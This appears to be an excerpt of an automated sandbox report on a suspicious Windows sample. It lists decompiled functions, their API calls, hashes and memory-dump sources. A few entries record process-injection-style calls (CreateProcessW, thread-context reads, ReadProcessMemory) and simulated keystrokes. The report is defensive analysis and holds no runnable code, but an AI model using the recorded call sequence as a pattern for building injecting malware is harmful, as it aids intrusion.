                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                    • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                    • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                    • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                    • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                    Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                      • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 717694121-0
                                                                                                                                    • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                    • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                    • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                    • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                    Function 03F932ED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03F93AAB
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F93B41
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F93B63
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                    • Instruction ID: e7435f7a20dcb573f12d37415663a529b8b6f5ab7aa5826031335e51c213627e
                                                                                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                                    • Instruction Fuzzy Hash: F912CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                                                                                                    Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                    Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                                    • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                    • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                                                                    • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                    Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 181713994-0
                                                                                                                                    • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                    • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                    • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                    • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                    Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                    • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                    • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                    • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                    • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                    Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                                    • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$PointerWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 539440098-0
                                                                                                                                    • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                    • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                    • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                    • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                    Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 181713994-0
                                                                                                                                    • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                    • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                    • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                    • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                    Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wfsopen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                    • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                    • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                    • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                    • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                    Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                    • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                    • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                    • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                    Function 03F942EC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 03F94301
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                    • Instruction ID: b4e532700632bdb49fa45e174cc4c33f5e0af1b905f345bb4fc6df968b0cc3e4
                                                                                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                    • Instruction Fuzzy Hash: B1E09A7494010DAFDB10EFB8D54969E7BB4EF04301F1005A1FD0596681DA309A549A62
                                                                                                                                    Function 03F942F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 03F94301
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction ID: 1567bb68ca674b26071011dce8f831a48fc5ba781daa3a0bf7284f29a304990c
                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction Fuzzy Hash: 6AE0E67494010DDFDB00EFF8D54969E7FB4EF04301F1001A1FD01D2281D6309D509A62

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                    • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$State$LongProcWindow
                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                    • API String ID: 1562745308-4164748364
                                                                                                                                    • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                    • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                    • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                    • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                    Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                                    • API String ID: 0-3772701627
                                                                                                                                    • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                    • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                                    • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                    • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                                    Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                    • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                    • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 3778422247-2988720461
                                                                                                                                    • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
